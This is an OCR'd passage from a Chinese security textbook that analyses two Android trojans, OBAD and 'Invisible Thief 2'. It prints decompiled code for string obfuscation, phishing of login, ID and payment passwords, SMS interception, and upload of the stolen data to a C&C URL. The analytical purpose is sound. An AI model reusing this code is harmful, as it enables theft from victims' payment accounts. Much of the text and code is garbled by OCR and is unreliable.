的 Java Archive (JAR) 格式 ) 中 发 现 了 一 个 错误 ， 利 用 这 个 缺陷 能 破坏 Dalvik 
字 节 码 转 换 成 Java 字 节 码 的 过 程 ， 并 提高 了 对 木马 进行 分 析 的 难度 。 另 外 ， 在 
Android 系统 中 还 发 现 了 涉及 对 AndroidManifestxml 文件 的 权限 攻击 , 在 此 文件 
中 描述 了 应 用 的 结构 、 定 义 其 启动 参数 等 。OBAD 以 不 符合 谷歌 的 标准 修改 了 
AndroidManifest.xml 文件 ,但 是 由 于 对 漏洞 的 挖 据 利 用 使 得 它 仍 可 以 正确 地 被 智 
能 手机 处 理 。OBAD 上 述 隐藏 和 修改 操作 ， 使 得 安全 人 员 很 难 对 这 个 木马 进行 
动态 分 析 。 

另外 , ОВАР 的 作者 还 使 用 了 另 一 个 Android 系统 未 知 的 缺陷 。 利用 这 个 缺 
陷 ， 恶 意 应 用 可 以 注册 为 设备 管理 器 享用 特权 ， 而 且 并 不 会 出 现在 应 用 程序 列 
表 中 。 正 因 如 此 ， 不 可 能 在 恶意 应 用 获取 权限 后 从 智能 手机 中 删除 ， 并 且 是 在 
后 台 模 式 下 工作 的 ， 没 有 任何 UI 界面 可 见 。 

在 OBAD 木马 程序 中 ， 所 有 的 外 部 方法 都 是 通过 反射 调用 的 ， 包 括 类 和 方 
法 的 名 称 等 所 有 字符 串 都 是 被 加 密 的 ， 具 体 代码 如 图 19-10 所 示 。 

每 个 类 都 有 一 个 局 部 描述 符 以 从 本 地 更 新 字 节 数组 中 获得 所 需 的 加 密 字符 
串 ， 所 有 字符 串 都 隐藏 在 这 个 数组 中 ， 具 体 代码 如 图 19-11 所 示 。 
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图 19-9 Android 木马 OBAD 
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private static String 0022022 (2л paramintl, int рагавіпе2, imt paranintj) 
t 
byte[] array0fBytel = oCI1Cl1; 
int i = paramInt2 + 40; 
int j = paranIntl + 75; 
byte[] array0fByte2 = mew byte[i]; 
int k = 0; 
int n; 
if (arrayOfBytel == null) 
n-i 
for (int n = paranInt3; ; n = arrayOfBytel[paranInt3]) 
$ 
paranInt3+; 
j = -4+ (m+n); 
array0fByte2[k] = (byte)j; 


kH; 
if (k >= i) 
return new String(arrayOfByte2, 0); 
m= iF 
) 
) 
// ERROR // 
public void onReceive(android.content.Context paramContext, android.content.Intent paramIntent) 
t 
// Byte code: 
// 0: invokestatic 141 java/lang/System:currentTimeMillis — ()J 


// 3: lstore 3 
Hu 4: goto +11 -> 15 
HH 7: astore 84 
HH 9: aload 84 


H : invokevirtual 147 java/lang/Throwable:getCause — ()Ljava/lang/Throwable; 

7 : athrow 

H : ldc 149 

H : invokestatic 155 java/lang/Class:forName (Ljava/lang/String;)Ljava/lang/Class; 

Hu ldc 157 

H &const null 

H invokevirtual 161 java/lang/Class:getMethod — (Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method; 
// aconst_null 

7 aconst null 

H : invokevirtual 167 java/lang/reflect/Method:invoke ^ (Ljava/lang/Object;[Ljava/lang/0bject;)Ljava/1ang/Übject; 
H : checkcast 169 java/lang/Long 


图 19-10 反射 调用 和 字符 串 加 密 


private static byte[] oCI1Cll = ( 52, 1, -42, 43, -20, -42, 0, SS, 5, -14, -3, 4, -53, 49, -11, 33, -12, -57, 37, 17, 7, -30, -19, 44, -43, 61, -47, -TTo 


public static String CCccICc(String paramString) 
( 
new java/Lang/String: 
OCIACAL. 0C72C22 (parenString); 
"bETXOAKSFHZUOVEXBO". getBytes () ; 
return ""; 


) 


public static String CClIOcc(String paramString) 
( 
new java/Lang/String: 
SCLICL1.cCI1Cll(paremString); 
"622240иШАЗраТдд73@ВН1". getBytes () > 
return ""; 


) 


public static String CIIICIIC(String paramString) 
( 
new java/lang/String: 
SCLICll.cCI1Cll(paramString); 
"xSSpXsXLgSoxg3k ww". getBytes () ; 
return ""; 


图 19-11 数组 隐藏 


字符 串 需要 解密 的 C&C 地 址 ， 木 马 OBAD 首先 检查 网 络 是 否 可 用 ， 然 后 下 载 页 面 facebook.com. 
用 于 提取 某 个 页 面 元 素 并 使 用 它 作为 解密 密 钥 。 由 此 可 见 ,OBAD 只 有 联网 时 解密 C&C 地 址 是 可 用 的 。 
正 是 因为 这 一 特性 ， 使 得 分 析 工 作 变 得 更 加 复杂 。 

OBAD 中 的 一 些 字 符 串 是 通过 另外 的 方式 加 密 的 ， 本 地 解码 器 接收 到 一 个 Base64 编码 字符 串 并 对 其 解 
码 ， 解 码 字 符 串 首先 与 key 的 MDS 异 或 操作 ， 然 后 则 是 字符 串 UnsupportedEncodingException 的 MD5。 要 


em, 
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获取 key 的 MD5, 需要 用 同样 的 本 地 解码 器 解密 另 一 个 字符 串 然后 将 其 作为 MDS 参数 。 这 样 能 够 保护 诸如 
函数 SendTextMessage 的 名 称 之 类 的 key 字符 串 值 ， 如 图 19-12 所 示 。 


x411 
JOKSND 
411 


30K SD 


图 19-12 获取 MDS 
接 下 来 开始 分 析 并 破译 所 有 的 字符 串 ， 如 图 19-13 所 示 。 


static private boolean doChmod(java/io/File arg Filel) 


Label ө: 

Class lvar Classi«arg Filel.getClass() 

Class [] lVar ClassArri«new Class[2]( Boolean.TYPE, Boolean.TYPE } 
reflect/Method lvar Methodlelvar Class1.getMethod( seti , lvar ClassArri) 
Object [] lvar_Objeclarrisnew Object[2]{ Buolean.valueOf(1), Boolean.valueOf(0) } 


if (1var_Method1.invoke(arg_Filel, lvar ObjectArri).equals(Boolean.TRUE) == Ө) 
goto Label 2 else goto Label 1 


Label 2: 

Runtime lvar Runtimei-Runtime.getRuntime() 

StringBuilder svar String&uilderi-new String8uilder(String.valueOf( 0644 ")) 

StringBuilder lvar StringBuilderi-svar StringBuilderi 

Object lvar Objecti=Class.forName(” ja ) .getHethod( nul1).invoke(arq Filel, null) 


Process lvar Processi-lvar. Runtimel.exec(lvar. StringBuilderi.append(lvar. Objecti).toString()) 
int lvar Intl«lvar Processi.waitFor() 
lvar. Process1.destroy() 


if (lvar Intl != ө) 
goto Labsl 4 else goto Label 3 


Label 4: 

Class lvar Class2«Class.forName( ) 

Class [] Iver ClassArr2-new Cless[4]( String, Integer-TVPC, Integer.TVPC, Integer.TVPC } 

reflect/Method lvar Method2«lvar Class2.getMethod( , lvar ClassArr2) 

Object [] lvar_Objectarr2=new Object[4] 

Object lvar_Object2=Class.forName(" java ).getMethod( “get t ‚ null).invoke(arg Filet, null) 


lvar ObjectAnr2[0]-lvar Object2 

lvar ObjectArr2[1]«Integer.valueOf(420) 
lvar ObjactArr2[2]«Integer.valueOf(-1) 
lvar ObjectArr2[3]-Integer.valueOf(-1) 


图 19-13 ”破译 所 有 的 字符 串 


当 启 动 ОВАР 后 会 尝试 获取 设备 管理 员 的 权限 ， 如 图 19-14 所 示 。 木 马 OBAD 的 一 个 特点 是 一 旦 已 
经 获得 了 管理 员 权限 ， 就 将 无 法 删除 。 这 一 功能 是 通过 利用 一 个 先前 未 知 的 Android 漏洞 实现 的 ， 现 在 谷 
歌 已 经 解决 了 这 个 漏洞 。 这 样 恶意 应 用 具有 了 扩展 的 特权 ， 但 并 没有 出 现在 设备 管理 器 应 用 权限 列表 中 ， 
如 图 19-15 所 示 。 

在 扩展 设备 管理 权限 后 ， 木 马 OBAD 可 以 阻止 设备 屏幕 长 达 10 秒 ， 这 通常 发 生 在 设备 接 到 WiFi 网 络 
或 蓝牙 被 激活 之 后 ， 建 立 连接 后 木马 能 将 本 身 和 其 他 恶意 应 用 复制 到 附近 其 他 设备 。 这 些 行为 可 能 是 
Backdoor.AndroidOS.Obad.a 用 来 试图 防止 用 户 发 现 其 恶意 活动 的 。 此 外 ， 该 木马 会 尝试 通过 执行 su 命令 来 
获得 root 权限 ， 如 图 19-16 所 示 。 

是 否 已 经 成 功 获得 超级 用 户 权限 的 信息 会 被 发 送 到 C&C 服务 器 ， 这 样 在 获得 了 root 权限 后 ,破坏 者 可 
以 在 一 个 有 利 的 位 置 远程 控制 执行 命令 。 当 第 一 次 启动 OBAD 后 ， 恶 意 应 用 会 收集 如 下 信息 ， 并 将 其 发 送 
到 C&C 服务 器 androfox.com 中 。 


3) 


| Android ft 9? & fo S di Sc t 


com.android.system.admin 
WY! “wo 


Sorge 

Total 380KB 
App 328KB 
USB storage app 0.008 
Data 52 00KB 
Phone storage 0.008 
cache 

Cache 0.008 


Activate 


图 19-14 获取 设备 管理 员 的 权限 ”图 19-15 设备 管理 器 应 用 权限 列表 图 19-16 获取 root 权限 
蓝牙 设备 的 MAC 地 址 。 

口 运营 商 名 字 。 

口 电话 号 码 。 

О IMEI. 

а 手机 用 户 账户 余额 。 
口 

口 

在 


口 


是 否 获得 设备 管理 员 权限 。 
当地 时 间 。 
:收集 到 上 述 信息 后 ， 会 以 JSON 对 象 加 密 的 形式 发 送 给 远程 服务 器 ， 如 图 19-17 所 示 。 


{"app":2, "bt_mac":0, "simOpName";"Beeline", "numb":" 
":"Beeline", "conf":{ "key die" "key. 


"task": {}, "ime: 
"key url" 


:"30", 


2585c636794£4954d58 668525 £10fSde" о такт: ["http: \/\/wew. aay. com\/load.php", 
"http: \/\/www.androfox.tk\/load.php"] }, "acc":[], "balanceTime":1368813098158, "balance":"1200", 
"system":"no",  "time":1368813098158, "simOp":"Beeline", "netOp":"Beeline", "rooted":"no", 


"netOpName": "Beeline", "netco":"Beeline") 


图 19-17 发 送 收集 信息 到 远程 服务 器 


这 样 当 每 次 建立 连接 时 ， 这 些 信息 都 会 发 送 到 当前 的 C&C 服务 器 。 另 外 ，OBAD 恶意 应 用 还 会 报告 它 
当前 自身 状态 ， 这 通过 发 送 当前 premium 号 码 表 和 文本 信息 、aos 参数 、 任 务 列表 、C&C 服务 器 列表 来 实 
Ji. TE OBAD 第 一 次 C&C 通信 会 话 时 ， 会 发 送 一 个 空白 表 和 进行 解密 了 的 C&C 地 址 列表 ， 在 会 话 中 木马 

可 能 会 接收 到 一 个 更 新 了 的 premium 号 码 表 和 一 个 新 的 C&C 地 址 列表 。 为 了 进行 回应 ，C&C 服务 器 会 发 
送 一 个 类 似 如 下 解密 后 的 另 一 个 ISON 对 象 。 

{"nextTime":1,"conf":{"key_con":"oKZDAgIGINy","key_url":"3ylOp9UQwk", 

"key_die":"ar8aW9YTX45TBeY","key_cip":"IRo6JfLq9CRNd6F7IsZTyDKKg8UGESEICh4xjzk"}} 

其 中 ，nextTime 是 一 个 C&C 服务 器 的 下 一 个 连接 ，conf 是 配置 字符 串 。 配 置 字符 串 可 能 包含 连接 到 新 
的 C&C 服务 器 的 指令 、 目 的 keys 号 码 表 文本 信息 、 新 任务 参数 。 此 外 ， 通 信 加 密 (key сір) 的 keys 可 能 
发 送 到 conf。 

OBAD 也 可 以 用 短信 来 控制 木马 ， 配 置 字符 串 也 可 能 包含 key 字符 串 (key соп, key url, key die) , 
该 木马 会 寻找 传 入 的 文本 信息 ， 并 相应 执行 某 些 操作 。 分 析 每 个 传 入 的 文本 信息 都 可 能 找到 存在 的 key， 如 
果 找 到 一 个 key 则 执行 如 下 相应 操作 。 

口 key con: 立即 建立 一 个 C&C 的 连接 。 


e 


RRE Internet ERRER S RSEN, 如 图 19-18 所 示 。 


口 key die: 从 数据 库 中 删除 任务 。 


О key ші: 新 的 C&C 服务 器 地 址 。 破 坏 者 可 以 创建 一 个 新 的 C&C 服务 器 并 发 送 包 含 地 址 key 的 文本 信 


息 给 被 感染 的 设备 ， 这 将 使 所 有 被 感染 的 设备 重新 连接 到 新 的 服务 器 。 


如 果 在 发 送 的 文本 信息 key 中 找到 conf, 则 木马 OBAD 将 发 送 一 个 短信 给 C&C 提供 的 号 码 。 这样 , SE 


ес š » 
Buileerd .sppenc( com/android/systen/a 


CHO Nie) 
) 


01112 .execSQL(1v. 


ir. Cursor .getColunnIndex( “pat")) 


f (this psta equal s(" EA 
goto Label 52 else goto 


Label 34: 


if (con/android/system/admin/1cc1010.pattennMatch(this.msgPatterr, this.msgString) <- 9) 
goto Label 52 else goto Lobel 51 


Label $2: 


+ (Ivar Cursord novetonent() Iz 9) 
goto Label. 33 else goto Label 


Label $i: 
goto Label 35 
label 51: 
This.getNsGstring() 
this. nsgNune var, Curscr2.gerstring(lvar cunsor2.getColunnIndex(;ru97)) 
thls.nsgText=lvar. -Cursor z getstrin ng(lvar_Cursor2.getcolunnIndext 5-5. )) 
svar Threadienew Thread 
ShSSender Threoó svar S"ssendermhr езд1-пем snssenderTheeadtthts) 
svar_Thread cin init»(sver. SMSSenderThreadl) 
r-Thresdt start () 
pote Labe 


19-18 发 送 短信 给 C&C 提供 的 号 码 


in/cicolll.tableA0C) 


itringauilden].append(^ ;").toString()) 


KE OBAD A C&C 接收 指令 后 , 会 将 信息 记录 在 数据 库 中 。 每 条 记录 在 数据 库 的 指令 包含 了 指令 序列 


、C &C 指定 的 执行 时 间 和 参数 。 有 具体 包含 如 下 指令 。 


发 送 文本 消息 。 参 数 包含 数字 、 文 字 和 删除 回复 。 
PING 。 

通过 USSD 接 收 账 户 余额 。 

作为 代理 发送 指定 的 数据 到 指定 地 址 ， 并 传达 响应 〉。 
连接 到 指定 的 地 址 (clicker) 。 

从 服务 器 上 下 载 文件 并 安装 。 

发 送 智能 手机 中 应 用 列表 到 服务 器 。 

发 送 由 C&C 服务 器 指定 安装 的 应 用 信息 。 

发 送 用 户 连 接 数 据 到 服务 器 。 

远程 Shell。 后 台 执 行 破坏 者 指定 的 命令 。 

发 送 一 个 文件 给 所 有 检测 到 的 蓝牙 设备 。 


DODDODOCOOCODOCODDUDO 


从 Obad.a 命令 列表 中 可 知 OBAD 恶意 程序 能 通过 蓝牙 传播 ，C&C 服务 器 发 送 木 马 文本 地 址 给 受 感染 


的 设备 ， 然 后 C&C 命令 恶意 程序 扫描 附近 的 设备 启用 蓝牙 连接 ， 并 尝试 将 下 载 的 文件 发 送 给 它们 。 


193 “隐身 大 次 二 代 ”木马 


Би 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 19 È BIKER” Khai 


如 果 使 用 网 上 支付 却 无 法 收 到 短信 验证 码 ， 一 定 要 检查 手机 是 否 感染 了 “隐身 大 盗 ” 木 马 ， 该 木马 专 


e 


这 系统 安全 和 反 编 译 实战 


门 屏蔽 并 窃取 受害 者 验证 码 短信 ， 从 而 盗 取 网 上 支付 账户 资金 。 不 过 , 360 手机 卫士 近日 又 发 现 “ 隐 身 大 盗 ” 
出 现 升级 变种 ， 以 验证 账户 为 由 骗 受 害 者 输入 身份 证 号 、 支 付 密码 等 信息 ， 从 而 完全 控制 受害 者 的 支付 账 
户 。“ 隐 身 大 资 ” 升 级 变种 后 更 为 隐蔽 。 首 先 改 变 了 窃取 短信 内 容 的 方式 ， 不 再 通过 转发 短信 进行 ， 而 是 
采取 联网 上 传 短信 到 黑客 服务 器 的 方式 ; 其 次 ， 采 取 了 连环 攻击 手段 ， 在 用 户 安 装 完 伪装 成 流行 应 用 的 “大 
包 ” 之 后 ， 诱 导 用 户 再 安装 一 个 伪装 成 账户 安全 验证 的 “小 包 ”， 大 包 专 门 窃取 账号 密码 、 身 份 证 号 等 ， 
“小 包 ” 则 暗中 监控 、 识 别 受害 者 短信 并 联网 上 传 。 据 检测 分 析 ，“ 隐 身 大 资 二 代 ” 会 判断 中 招手 机 接收 
的 短信 号 码 和 内 容 ， 对 普通 短信 放行 ， 对 银行 、 第 三 方 支付 平台 、 运 营 商 等 特殊 号 码 发 来 的 短信 进行 屏蔽 
和 上 传 。 中 招手 机 最 直观 的 现象 是 ， 无 法 再 收 到 网 银 和 网 上 支付 的 验证 码 短信 。 在 本 节 的 内 容 中 ， 将 详细 
讲解 “隐身 大 盗 ” 木 马 的 基本 知识 。 


19.3.1 案例 介绍 


市 民 管 先生 是 一 名 淘宝 卖家 ， 专 门 经 营 门 窗 制作 和 安装 。 不 久 前 ， 一 位 陌生 买 家 主动 与 管 先生 联系 ， 
却 不 提 想 买 什么 商品 ， 而 是 在 聊天 消息 里 发 来 一 个 二 维 码 ， 说 “用 手机 微 信 扫 一 下 就 可 以 看 到 想 买 的 门窗 
详细 资料 ”， 聊 天 信息 截图 如 图 19-19 所 示 。 

为 了 做 成 生意 ， 管 先生 立刻 拿 出 手机 扫描 了 二 维 码 ， 却 没 看 到 什 кш morenas 
么 门窗 信息 ， 于 是 发 消息 询问 ， 对 方 则 继续 下 和 钩 钓鱼 : “你 下 载 安装 wass 
后 直接 点 开 就 可 以 看 到 了 。” 管 先生 没有 想到 的 是 ， 他 点 击 按钮 ， 实 。 RE ames 
际 上 是 把 一 个 名 为 “隐身 大 次 ”的 木马 装 进 了 手机 。 ee 

据 管 先生 向 360 网 购 先 赔 中 心 反 馈 ， 他 在 安装 二 维 码 中 的 软件 后 ，。 BPRS 
对 方 以 “方便 联系 ”为 由 索要 了 他 的 手机 号 码 ， 然 后 借口 去 吃饭 而 离 [n] [m] 

开 。 管 先生 本 来 也 没 在意 ， 但 一 个 小 时 后 ， 他 忽然 发 现 自己 的 旺旺 账 

号 登 不 上 了 ， 原 来 是 密码 已 经 被 人 修改 ， 之 后 再 查看 支付 宝 账户 ， 发 T 
现 不 光 余额 中 的 3000 元 被 盗 , 与 支付 宝 绑 定 的 银行 卡 也 被 消费 了 2000 ш 
元 ， 而 他 的 账户 也 已 被 关联 到 了 一 个 陌生 手机 号 注册 的 支付 宝 账户 上 。 [n] 

SUE A^ EI ЖИК ЖМ Л Ze s ӘНИ? 小 小 二 维 码 又 是 如 何 
偷 钱 的 ? 其 实 管 先 生 扫 描 二 维 码 安装 的 软件 ， 就 是 流行 的 “隐身 大 盗 ” 
手机 木马 。 该 木马 在 装 入 手机 后 ， 会 拦截 中 招手 机 收 到 的 短信 ， 并 直 
接 转发 给 不 法 黑客 。“ 对 于 网 上 支付 账户 来 说 ， 由 于 手机 号 本 身 也 是 图 1919 WARE 
账户 名 ， 黑 客 在 监视 管 先生 手机 短信 后 ， 再 以 短信 验证 的 方式 操作 支 
付 账户 重 置 密码 ， 从 而 控制 了 管 先 生 的 网 上 支付 账户 。”360 安全 专家 表示 ， 由 于 支付 宝 “ 找 回 密码 ”还 需 
要 验证 身份 证 号 ， 骗 子 很 可 能 事先 已 经 通过 其 他 途径 获取 管 先生 的 身份 证 号 ， 再 进行 定向 攻击 。 

另 据 介绍 ， 由 于 “隐身 大 盗 ” 木 马 会 拦截 手机 收 到 的 网 银 、 支 付 类 验证 短信 ， 中 招 者 很 难 察觉 黑客 的 
盗号 行为 。 而 网 店 卖家 由 于 支付 账户 存在 余额 的 概率 较 高 ， 也 成 为 手机 木马 的 重点 攻击 对 象 ， 二 维 码 就 是 
此 类 木马 的 常用 传播 途径 。 

由 此 可 见 ， 二 维 码 不 能 “ 见 码 就 扫 ”， 尤 其 要 警惕 陌生 人 发 来 的 二 维 码 ， 例 如 带 有 软件 下 载 、 账 号 登 
录 网 页 的 二 维 码 ， 应 立即 关闭 页 面 。 如 果 手 机 曾经 扫描 过 可 疑 二 维 码 ， 应 使 用 360 手机 卫士 等 专业 安全 软 
件 进 行 查 杀 ， 以 免 遭 遇 短信 泄露 甚至 财产 损失 。 


19.3.2 DIRE 


“隐身 大 盗 二 代 ” 采 取 了 连环 攻击 手段 ， 在 用 户 安装 完 伪装 成 流行 应 用 的 “大 包 ” 之 后 ， 诱 导 用 户 再 


e 


‚йв (18:4 
不 好 意思 , 亲 , 我 扫 了 , 但 打 不 开 


зое sasam ОП 


安装 一 个 伪装 成 账户 安全 验证 的 “小 包 ”， 具 体 分 工 如 下 。 

大 包 伪 装 为 常用 的 应 用 ， 专 门 窃取 账号 密码 、 身 份 证 号 等 ， 具 体 说 明 如 下 所 示 。 

а 通过 二 维 码 传播 : 传输 方式 更 隐蔽 ， 将 木马 应 用 的 下 载 链 接生 成 为 二 维 码 ， 通 过 扫描 二 维 码 即 可 下 载 。 

O 伪装 为 常用 应 用 诱导 输入 账号 和 密码 : 界面 伪装 成 常用 应 用 ， 启 动 后 显示 登录 界面 ,诱导 用 户 输入 
用 户 名 和 密码 。 

о 窃取 手机 号 码 并 连同 账号 密码 联网 上 传 : 应 用 启动 后 读 取 用 户 的 手机 号 码 , 连同 用 户 输入 的 账号 和 
密码 一 起 发 送 到 指定 的 服务 端 。 

口 诱导 安装 隐藏 的 “小 包 ”: 将 “小 包 ” 的 格式 名 去 掉 ， 放 在 木马 中 ， 当 需要 安装 “小 包 ” 叶 再 从 中 
恢复 ， 诱 导 用 户 进行 安装 。 

О 诱骗 输入 身份 证 和 支付 密码 并 上 传 : 诱骗 用 户 输入 身份 证 号 和 支付 密码 ,将 输入 的 信息 联网 上 传 到 
指定 服务 端 。 

小 包 在 后 台 静 默 运行 ， 负 责 暗中 监控 、 识 别 受 害 者 短信 并 联网 上 传 ， 具 体 说 明 如 下 所 示 。 

O 开机 自 启 动静 默 执行 : 小 包 安装 后 ， 隐 藏 图 标 ， 在 后 台 静 默 执行 ， 一 般 用 户 无 法 察觉 。 

口 监控 并 拦截 短信 : 拦截 短信 ， 并 将 拦截 的 短信 上 传 至 服务 器 。 


1. 恶意 程序 工作 原理 
隐身 大 盗 木 马 程序 的 工作 原理 如 图 19-20 所 示 。 


坏人 用 户 手机 主 程序 服务 器 插件 || 第 三 方 
= TENN, 
ERROREM > 
启动 主 程序 
| жалгылахюкакен_| 
输入 源 宝 账册 和 密码 > 
IF me | 
[xanenmsma en znane | 
« 检查 是 否 安装 狂 件 
gun" » 
{SAREE anuos um 
输入 身份 证 号 和 淹 宝 支付 密码 , 
жале ае RATE HES › 
k 发 送 短 全 (例如: M ER) 
“ Pusa 
Леленин 
联 取 所 有 用 户 信息 » 
MRRPREÉERRPRKS, ARAR 
"m 
坏人 用 户 手机 主 程序 服务 器 插件 || 第 三 方 


图 19-20 工作 原理 
a) 首先 通过 二 维 码 传播 “大 包 ” 
不 法 分 子 将 二 维 码 发 给 用 户 ， 用 户 扫描 二 维 码 ， 得 到 一 个 下 载 链接 ， 不 法 分 子 诱骗 用 户 下 载 并 安装 ， 
如 图 19-21 所 示 。 
还 有 另 一 种 传播 途径 ， 通 过 不 正规 的 安 卓 市 场 将 植 入 木马 的 常用 应 用 在 安 卓 市 场 上 架 ， 用 户 自 行 下 载 
安装 。 
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(2) 诱骗 用 户 输入 账号 和 密码 
木马 伪装 成 常用 应 用 ， 诱 导 用 户 输入 登录 的 账户 和 密码 ， 用 户 输入 后 单 击 “提交 ”按钮 ， 将 用 户 输入 
的 账号 和 密码 发 送 到 指定 的 服务 器 上 ， 如 图 19-22 所 示 。 


ыл 


图 19-21 可 扫描 的 木马 二 维 码 图 图 19-22 伪装 为 淘宝 二 手 


关键 代码 如 下 所 示 。 
String str1 TthisvalšetNÑame BetText().toString(; 
if (str1.equals(")) 
Toast.makeText(this.this$0, "请 输入 用 户 名 ", 0).show(); 
while (true) 
/获取 用 户 输入 的 账号 和 密码 
return; 


String str2 getText().toString(); 
if (str2.equals("")) 


{ 
Toast.makeText(this.this$0, "请 输入 密码 ", 0).show(); 
continue; 


} 
...// 将 读 取 的 数据 上 传 至 服务 器 端 
[ToolHelper.postDatd/"http://www.gamefiveo.com/saves. php" localArrayL ist) 
G) 窃取 手机 号 码 
通过 系统 函数 读 取 用 户 的 手机 号 码 ， 如 果 能 获取 到 ， 将 手机 号 码 发 送 到 指定 的 服务 器 上 ， 如 图 19-23 所 示 。 


图 19-23 将 读 取 的 信息 上 传 至 服务 器 
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关键 代码 如 下 所 示 。 
TelephonyManagerlocalTelephonyManager -(TelephonyManager)this.this$0.getSystemService("phone"); 
MainActivity localMainActivity1 = this.this$0; 
String str3 = localTelephonyManage 
localMainActivity1.phoneNum = str3;13 MEI 
if (this.this$0.phoneNum.equals(")) 


t 
MainActivity localMainActivity2 = this.this$0; 
String str4 = localTelephonyManagergetDeviceld(); 
localMainActivity2.phoneNum = str4; 


1 
MainActivity.1.1 local1 = new MainActivity.1.1(this, str1, str2); 
new Thread(local1).start(); 


// 将 读 取 的 数据 上 传 至 服务 器 端 

ToolHelper.postData("http://www.gamefiveo.com/saves.php",localArrayList) 

(4) 诱导 安装 小 包 

木马 会 在 后 台 联 网 下 载 小 包 程序 ， 下 载 完成 后 提示 用 户 “ 为 了 资金 安全 ， 请 安装 支付 安全 软件 后 再 进 
行 操作 ”， 用 户 单 击 “ 确 定 ”按钮 即 完 成 了 “小 包 ” 的 安装 ， 如 图 19-24 和 图 19-25 所 示 。 


为 了 您 的 账号 安全 ， 请 安装 
中 心 后 再 进行 操作 , 


点 击 确定 ， 立 即 安装 


隐身 大 次 | km. 
assets 
tr 


META-INF = 
mai 
图 19-24 诱导 用 户 安装 小 包 图 19-25 ”小 包 文件 


对 应 代码 如 下 所 示 。 
/checkApkExist 检查 是 否 安装 小 包 
if (IMainActivity.checkApkExist(this.this$0, "google.tao")) 

{ 

MainActivity localMainActivity3 = this.this$0; 
AlertDialog.Builder localBuilder1 = new 
AlertDialog.Builder(localMainActivity3); 

AlertDialog.Builder localBuilder2 = localBuilder1.setCancelable(0); 

/下 面 欺骗 用 户 安装 

AlertDialog.Builder localBuilder3 =IocalBuilder1.setMessage(" 为 了 您 的 账号 安全 ， 请 安装 安全 中 心 后 再 进行 
操作 。 谢 谢 。\n\n 单 击 确定 ， 立 即 安装 "); 

MainActivity.1.2 local2 = new MainActivity.1.2(this); 

/用 户 点 击 确认 后 跳 转 至 安装 
AlertDialog.Builder localBuilder4 = localBuilder1.setNegativeButton(" 确 定 ", local2); 
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AlertDialog.Builder localBuilder5 = localBuilder1.setPositiveButton(" 取 消 ", null); 
AlertDialog localAlertDialog1 = localBuilder1 .create(); 
AlertDialog localAlertDialog2 = localBuilder1.show(); 
continue; 
H 


// 调 用 安装 函数 Install() 
MainActivity.Install(MainActivity.1.access$0(this.this$1), ""); 


publicstaticvoid Install(Context paramContext, String paramString) 
{ 


// 将 隐藏 在 木马 中 的 恶意 

File localFile = new File(str3, "tz.apk"); 

I| “|” SERRA apk, #587 Se AAT ӘЖЕ 
try 


{ 
InputStreamlocallnputStream]- paramContext.getAssets().open("tz"); 


if (!localFile.exists()) 


booleanbool = localFile.createNewFile(); 
localFileOutputStream = newFileOutputStream(localFile); 
arrayOfByte = newbyte[1024]; 

if (locallnputStream.read(arrayOfByte) «- 0) 


í 
localFileOutputStream.close(); 
locallnputStream.close(); 


) 


/下 面 两 行 代码 用 于 修改 文件 权限 

String str5 = "chmod " + str4 + " " + str3 + "/" + "tz.apk"; 

Process localProcess = Runtime.getRuntime().exec(str5); 
while (true) 


Intent locallntent2 = locallntent1.setAction("android.intent.action.VIEW"); 
Uri localUri = Uri.fromFile(localFile); 
Intent locallntent3 = locallntent1.setDataAndType(localUri, "application/vnd.android.package-archive"); 
Intent locallntent4 = locallntent1.setFlags(268435456); 
/安装 并 于 后 台 运 行 小 包 
paramContext.startActivity(locallntent1); 
(5) 诱骗 输入 身份 证 和 支付 密码 并 上 传 
当 用 户 完成 小 包 的 安装 后 ， 继 续 诱 骗 用 户 输入 身份 证 号 和 支付 的 密码 ， 用 户 输入 后 ， 单 击 “ 提 交 ” 按 
钮 ， 将 用 户 的 身份 证 和 支付 密码 发 送 到 指定 的 服务 器 ， 如 图 19-26 所 示 。 
对 应 代码 如 下 所 示 。 
String str1 = this.val$etcode.getText().toString();// 获 取 用 户 输入 的 身份 证 号 码 
if (str1.equals("")) 
Toast.makeText(this.this$0, "请 输入 您 的 身份 证 号 ", 0).show(); 
while (true) 
{ 


e 
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retum; 
String str2 = this.val$etCom.getText().toString();// 获 取 用 户 输入 的 支付 密码 
if (str2.equals(")) 


( 
Toast.makeText(this.this$0, "请 输入 支付 密码 ", 0).show(); 


continue; 
} 
this.this$0.pd.show(); 


LocationVerify.1.1 local1 = new LocationVerify.1. 1 (this, str1, str2); 
new Thread(local1).start(); 


/将 读 取 的 数据 上 传 至 服务 器 端 
ToolHelper.postData("http://www.gamefiveo.com/saves.php",localArrayList) 
账号 认证 
身份 证 号 : 
anes: 
mara 


图 19-26 诱导 用 户 输入 身份 证 和 支付 密码 并 上 传 


(6) 监控 并 拦截 验证 码 短信 
当 小 包 启 动 后 会 在 后 台 静 默 运行 ， 隐 藏 图 标 ， 用 户 无 法 感知 。 在 后 台 会 监控 短信 ， 并 拦截 所 有 手机 接 
收 的 短信 。 将 屏蔽 的 短信 上 传 到 指定 的 服务 器 端 ， 并 将 手机 上 的 信息 删除 ， 对 应 代码 如 下 所 示 。 
/监听 短信 接收 
if (str1.equals("android.provider. Telephony.SMS_RECEIVED")) 


{ 
arrayOfSmsMessage = getMessagesFromlntent(paramlntent); 
localStringBuilder1 = newStringBuilder(); 
i = arrayOfSmsMessage. length; 
j=0; 
} 


while (true) 


{ 
// 启 动 上 传 线程 准备 发 送 拦截 的 短信 至 服务 器 


if (>i) 
d 
BootReceiver.1 local1 = new BootReceiver.1 (this, localStringBuilder1); 
new Thread(local1 ).start(); 
abortBroadcast(); 
return; 
} 
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/拦截 短信 , 读 取 短信 内 容 

SmsMessagelocalSmsMessage = arrayOfSmsMessage[j]; 

String str4 = localSmsMessage.getOriginatingAddress(); 

this.originAddress = str4; 

String str5 = localSmsMessage.getDisplayMessageBody(); 

StringBuilderlocalStringBuilder2 = localStringBuilder1.append(str5); 

I 

// 将 拦截 的 短信 发 送 至 服务 器 

ToolHelper.postData("http://www.gamefiveo.com/saves.php", localArrayList); 

到 此 为 止 ， 用 户 的 手机 号 、 短 信和 身份 证 号 全 都 被 木马 黑客 掌握 ， 手 机 绑 定 的 网 上 支付 账户 也 将 完全 
沦陷 ， 黑 客 可 以 完全 操控 用 户 的 手机 支付 账号 ， 还 可 能 进一步 盗 刷 支付 账号 绑 定 的 银行 账号 。 该 木马 病毒 
